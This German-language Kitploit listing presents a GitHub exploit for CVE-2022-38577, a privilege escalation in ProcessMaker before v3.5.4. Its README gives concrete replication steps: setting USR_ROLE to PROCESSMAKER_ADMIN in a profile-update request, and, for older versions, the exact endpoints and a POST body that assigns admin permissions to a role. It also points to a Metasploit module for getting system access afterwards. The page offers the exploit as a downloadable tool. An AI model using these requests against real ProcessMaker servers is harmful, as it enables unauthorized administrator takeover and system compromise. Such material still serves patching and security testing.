Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-38577-Processmaker — ProcessMaker vor v3.5.4 wurde entdeckt, unsichere Berechtigungen auf der Benutzerprofilseite zu enthalten. Diese Sicherheitslücke ermöglicht es Angreifern, normale Benutzer zu Administratoren hochzustufen. | Kitploit
Tools/GitHubGitHub/sornram9254/cve-2022-38577-processmaker
Privilege EscalationExploit-FrameworksSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsArchived
GitHubsornram9254/cve-2022-38577-processmaker

CVE-2022-38577-Processmaker

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ProcessMaker vor v3.5.4 wurde entdeckt, unsichere Berechtigungen auf der Benutzerprofilseite zu enthalten. Diese Sicherheitslücke ermöglicht es Angreifern, normale Benutzer zu Administratoren hochzustufen.

Repository anzeigen
313vor 1 JahrNoch nicht geprüft

Dieses Repository wurde archiviert und verschoben nach: https://github.com/sornram9254/CVE-BBP-VDP


ProcessMaker - Benutzerprofil-Privilegieneskalation

CVE-2022-38577

Es wurde festgestellt, dass ProcessMaker vor v3.5.4 unsichere Berechtigungen auf der Benutzerprofilseite enthält. Diese Schwachstelle ermöglicht es Angreifern, normale Benutzer auf Administratoren zu eskalieren.

* Dieser Exploit kann mit dem Metasploit-Modul (ProcessMaker Plugin Upload) - exploit/multi/http/processmaker_plugin_upload verwendet werden, um Systemzugriff zu erhalten.

root@kitploit:~
Privilege Escalation replication.
for 2.5.0 - 3.0 GA:
    1. Log in as normal user.
    2. Change "USR_ROLE" on post request form when updating profile information to "PROCESSMAKER_ADMIN".
    3. Refresh page to get new role.

for 3.2.1 and before:
    1. Log in as normal user.
    2. Get Role ID by request "/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}"
    3. Get Permission ID by request "/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show"
    4. Update role to escalation privileges using POST Body request:
    POST /sysworkflow/en/neoclassic/roles/roles_Ajax
    request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}

https://youtu.be/PVaChDG3ZQ0
CVE-2022-38577 : ProcessMaker - Benutzerprofil-Privilegieneskalation

TODO: Code optimieren [requests module], und Exception Handling.

Referenz:
[x] https://nvd.nist.gov/vuln/detail/CVE-2022-38577
[x] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38577
[x] https://packetstormsecurity.com/files/168427/ProcessMaker-Privilege-Escalation.html
[x] https://drive.google.com/file/d/1iP9NYUkYEy_FGMpcnTkUWn8nGcqDT02_/view?usp=sharing

Tool herunterladen